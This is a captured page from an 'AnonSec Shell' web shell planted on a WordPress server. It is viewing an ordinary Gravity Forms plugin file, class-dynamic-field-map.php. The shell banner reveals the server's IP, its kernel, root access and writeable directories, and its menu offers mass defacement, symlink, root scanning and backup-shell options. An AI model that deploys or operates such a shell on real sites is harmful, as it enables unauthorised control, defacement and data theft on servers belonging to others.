AnonSec Shell
Server IP : 172.67.157.199  /  Your IP : 3.145.202.244   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/gravityforms/includes/settings/fields/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/gravityforms/includes/settings/fields/class-dynamic-field-map.php
<?php

namespace Gravity_Forms\Gravity_Forms\Settings\Fields;

use Gravity_Forms\Gravity_Forms\Settings\Fields;

defined( 'ABSPATH' ) || die();

// Load base class.
require_once 'class-generic-map.php';

class Dynamic_Field_Map extends Generic_Map {

	/**
	 * Field type.
	 *
	 * @since 2.5
	 *
	 * @var string
	 */
	public $type = 'dynamic_field_map';

	/**
	 * Initialize Dynamic Field Map field.
	 *
	 * @since 2.5
	 *
	 * @param array                                $props    Field properties.
	 * @param \Gravity_Forms\Gravity_Forms\Settings\Settings $settings Settings instance.
	 */
	public function __construct( $props, $settings ) {

		// Check for custom key support.
		if ( isset( $props['disabled_custom'] ) && $props['disabled_custom'] === true ) {
			$this->key_field['allow_custom'] = false;
			unset( $props['disabled_custom'] );
		} else if ( isset( $props['enable_custom_key'] ) && $props['enable_custom_key'] !== true ) {
			$this->key_field['allow_custom'] = false;
			unset( $props['enable_custom_key'] );
		}
		if ( isset( $props['allow_duplicates'] ) ) {
			$this->key_field['allow_duplicates'] = $props['allow_duplicates'];
		}

		$this->value_field['allow_custom'] = false;

		parent::__construct( $props, $settings );

	}

}

Fields::register( 'dynamic_field_map', '\Gravity_Forms\Gravity_Forms\Settings\Fields\Dynamic_Field_Map' );

Anon7 - 2022
AnonSec Team